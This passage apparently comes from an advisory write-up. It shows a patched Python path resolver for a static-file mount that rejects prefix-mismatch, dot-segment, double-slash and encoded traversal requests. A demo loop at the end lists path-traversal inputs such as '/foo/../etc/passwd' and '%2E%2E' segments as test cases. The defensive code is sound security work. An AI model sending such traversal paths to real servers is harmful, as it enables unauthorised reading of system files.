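    remainder is non-empty and does not start with '/'; the caller turns that into 404."""
    if not request_path.startswith(path_prefix):
        raise HttpError(404)
    return request_path[len(path_prefix):]


def resolve(request_path, path_prefix, system_path):
    """Map a request path to a file path under system_path, or raise HttpError."""
    path_info = strip_prefix(request_path, path_prefix)
    if path_info and not path_info.startswith("/"):
        raise HttpError(404)  # prefix-matching fix: '/foobaz/...' must not resolve under /bar
    segments = path_info.split("/")[1:] if path_info else []
    for seg in segments:
        if seg in ("", ".", ".."):
            raise HttpError(400)  # dot-segment / empty-segment fix ('../', '//')
    decoded = [unquote(seg) for seg in segments]  # URI-decoding fix: 'a%20b.txt' -> 'a b.txt'
    for seg in decoded:
        # Extra precaution (not from the advisory): re-check after decoding so an encoded
        # '..' or '/' or NUL cannot be smuggled past the checks above.
        if seg in (".", "..") or "/" in seg or "\x00" in seg:
            raise HttpError(400)
    return system_path.rstrip("/") + "".join("/" + s for s in decoded)


def status_of(request_path, path_prefix="/foo", system_path="/bar"):
    """(status, resolved file path or None) for a request against the advisory's example mount."""
    try:
        return 200, resolve(request_path, path_prefix, system_path)
    except HttpError as err:
        return err.status, None


if __name__ == "__main__":
    for path in ("/foo/docs/readme.txt", "/foo/a%20b.txt", "/foobaz/quux.txt",
                 "/foo/../etc/passwd", "/foo//etc/passwd", "/foo/%2E%2E/secret"):
        print(f"{path:24} -> {status_of(path)}")
```

Run stand-alone, the script shows the advisory's own example `/foobaz/quux.txt` answered with 404 instead of resolving to `/barbaz/quux.txt`, and both `../` and `//` rejected with 400 before any path under `/bar` is built.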